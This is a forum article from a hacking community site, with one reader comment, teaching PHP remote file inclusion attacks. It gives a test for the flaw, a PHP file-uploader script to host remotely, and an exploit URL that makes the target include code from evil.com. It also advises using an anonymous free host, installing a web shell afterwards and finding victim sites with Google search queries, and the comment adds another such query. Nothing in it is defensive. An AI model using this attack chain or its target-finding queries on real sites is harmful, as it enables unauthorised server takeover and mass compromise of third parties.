Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

Include Exploits

  1. Home
  2. Articles
  3. Web Hacking
  4. Include Exploits

Include Exploits

By ghostghost | 94683 Reads |
0     0

In this article I will teach you the basics of Include Exploits. If you understand php then this will help, although not much.

When a site uses one page to call all the others around a basic template, they can become subject to exploitation under certain circumstances.

e.g. http://www.abc.com/index.php?page=news

To test if its vulnerable, try changing it to abc or whatever

e.g. http://www.abc.com/index.php?page=abc

If its vulnerable you should get an error like this:

Warning: main(abc.php): failed to open stream: No such file or directory in /home/dir/public_html/index.php on line 01

Ok, now we are in business. We now know that the script takes $_GET['page'] and adds .php, then includes it.

e.g. $page = $_GET ['page'] . ".php"; include ($page);

So, what we need now is an uploader to allow us to upload files on to there server. Here's some dazzling code written by cheesy himself:

<?php

if ( $userfile ) { @$res=copy($userfile,"$userfile_name"); if ( !$res ){ print "Upload failed! \n"; }else{ print "Upload of $userfile_name successful \n"; } } ?>

<FORM method=POST ENCTYPE="multipart/form-data"> File to Upload <INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="5000000"> <INPUT NAME="userfile" TYPE="file" size=35> <INPUT TYPE="submit"> </FORM> </HTML>

So, we need to host this code on a server that doesnt support php or just edit your htaccess so your server treats it as html or whatever. A good, simple free host that doesnt support php and is quick, easy and anonymous is cjb.net

So to exploit the page simply add your url for the uploader script:

e.g. http://www.abc.com/index.php?page=http://evil.com/uploader

Remember if the site adds .php only the page variable be sure to leave it off. Then the uploader pops up and you can install webadmin or a web-based shell.

To find vulnerable sites, we can use our best friend, google. Good searches include:

inurl:"index.php?page=downloads" inurl:"index.php?page=news.php"

Be imaginative :)

Thanks for reading and i hope you've learnt something new.

Will.

Comments
sam207's avatar
sam207 16 years ago

"inurl:.php?page=" is the good dork to use I think.. Its nice article though I don't feel its awesome.. Very Good I choose..